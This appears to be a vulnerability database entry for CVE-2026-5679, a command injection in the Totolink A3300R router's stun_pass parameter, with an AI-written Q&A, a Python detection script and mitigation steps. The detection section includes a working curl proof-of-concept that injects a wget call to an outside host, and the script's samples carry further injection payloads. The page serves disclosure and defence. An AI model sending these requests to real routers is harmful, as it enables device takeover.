CVE-2026-5679
Received - Intake
OS Command Injection in Totolink A3300R vsetTr069Cfg Function

Publication date: 2026-04-06

Last updated on: 2026-04-29

Assigner: VulDB

Description
A security vulnerability has been detected in Totolink A3300R 17.0.0cu.557_B20221024. The impacted element is the function vsetTr069Cfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument stun_pass leads to os command injection. The exploit has been disclosed publicly and may be used.
Meta Information
Published
2026-04-06
Last Modified
2026-04-29
Generated
2026-05-07
AI Q&A
2026-04-06
EPSS Evaluated
2026-05-05
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a3300r 17.0.0cu.557_b20221024
Helpful Resources
Exploitability
CWE
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-5679 is a command injection vulnerability in the Totolink A3300R router firmware version 17.0.0cu.557_B20221024. It exists in the function vsetTr069Cfg within the /cgi-bin/cstecgi.cgi file. The vulnerability occurs because the parameter "stun_pass" from incoming requests is unsafely concatenated into a command string and executed by the router's system function. An attacker can send a specially crafted POST request with malicious shell commands in the "stun_pass" parameter, which the router executes, allowing arbitrary command execution.

This means an attacker can run any command on the router with the privileges of the web service, potentially leading to full device compromise.


How can this vulnerability impact me?

This vulnerability can allow an attacker to execute arbitrary commands on the affected router remotely. This can lead to full compromise of the device, including unauthorized access, control over network traffic, installation of malicious software, or use of the router as a pivot point for further attacks within the network.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for suspicious POST requests sent to the endpoint /cgi-bin/cstecgi.cgi containing the parameter "stun_pass" with unusual or suspicious values that may include shell command injections.

A practical detection method is to capture and analyze HTTP POST traffic targeting /cgi-bin/cstecgi.cgi and inspect the "stun_pass" parameter for injected commands or unexpected payloads.

For example, you can use the following curl command to test if the device is vulnerable by sending a crafted POST request with a suspicious "stun_pass" value:

  • curl -X POST http://[router_ip]/cgi-bin/cstecgi.cgi -H "Content-Type: application/json" -d '{"stun_pass":"4343$(wget 192.168.6.1:8888/testpoc)"}'

Additionally, network intrusion detection systems (NIDS) can be configured to alert on POST requests to /cgi-bin/cstecgi.cgi containing the "stun_pass" parameter with suspicious shell command patterns.
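The detection guidance above (inspect POST traffic to /cgi-bin/cstecgi.cgi and look for shell constructs in the "stun_pass" parameter) can be turned into a small inspection routine. The script below is an added example, not code from the CVE record, the vendor or any NIDS project; it parses raw HTTP requests, picks out JSON bodies sent to the endpoint named on this page, and flags a stun_pass value that contains shell substitution, separator or redirection characters. The sample requests and the 192.0.2.1 host are constructed for the example, and the set of metacharacters is an assumption about what a legitimate STUN password never needs.

```python
"""Added example (not part of the CVE record): flag HTTP POST requests to
/cgi-bin/cstecgi.cgi whose JSON body carries a "stun_pass" value containing
shell metacharacters, the traffic pattern the detection guidance describes.
All sample requests below are constructed for this example."""
import json
import re
from urllib.parse import urlsplit

TARGET_PATH = "/cgi-bin/cstecgi.cgi"   # endpoint named in the advisory
PARAM = "stun_pass"                    # injected parameter named in the advisory

# Shell constructs that have no place in a STUN password (assumption): command
# substitution, parameter expansion, separators, pipes, redirection, newlines.
SHELL_META = re.compile(r"\$\(|`|\$\{|[;&|<>\n\r]")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, body); None if malformed."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split()
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    # urlsplit drops any query string so "?x=1" variants still match the path.
    return method, urlsplit(target).path, body


def inspect_request(raw: bytes):
    """Return None for benign traffic, otherwise a dict describing the alert."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, path, body = parsed
    if method != "POST" or path != TARGET_PATH:
        return None
    try:
        payload = json.loads(body.decode("utf-8", errors="replace"))
    except json.JSONDecodeError:
        # Not JSON: cannot be checked field by field, so surface it for review
        # without claiming it is an injection attempt.
        return {"path": path, "reason": "unparseable body", "value": None}
    if not isinstance(payload, dict) or PARAM not in payload:
        return None
    value = str(payload[PARAM])
    match = SHELL_META.search(value)
    if match is None:
        return None
    return {
        "path": path,
        "reason": f"shell metacharacter {match.group()!r} in {PARAM}",
        "value": value,
    }


def scan(requests):
    """Run inspect_request over raw requests and collect the alerts."""
    return [alert for alert in (inspect_request(r) for r in requests) if alert]


# Constructed sample traffic: one ordinary configuration save, two requests
# carrying shell constructs in stun_pass, and one GET that is out of scope.
SAMPLE_REQUESTS = [
    b"POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    b"Content-Type: application/json\r\n\r\n"
    b'{"stun_pass":"Secret123"}',
    b"POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    b"Content-Type: application/json\r\n\r\n"
    b'{"stun_pass":"4343$(id)"}',
    b"POST /cgi-bin/cstecgi.cgi?x=1 HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    b"Content-Type: application/json\r\n\r\n"
    b'{"stun_pass":"x;ls"}',
    b"GET /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert)
```

In production the raw requests would come from a packet capture or a reverse proxy's request log rather than the embedded list; the matching logic is the same. Matching on metacharacters rather than specific commands keeps the check independent of whatever payload an attacker chooses, at the cost of an occasional false positive on passwords that legitimately contain "&" or "|", which is why the alert records the offending value for a human to review.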


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the vulnerable endpoint /cgi-bin/cstecgi.cgi to trusted networks or IP addresses only, to prevent unauthorized exploitation.

If possible, disable or block POST requests to /cgi-bin/cstecgi.cgi until a patch or firmware update is applied.

Monitor network traffic for suspicious POST requests containing the "stun_pass" parameter and block or alert on such attempts.

Contact the vendor or check for firmware updates that address this vulnerability and apply them as soon as they become available.

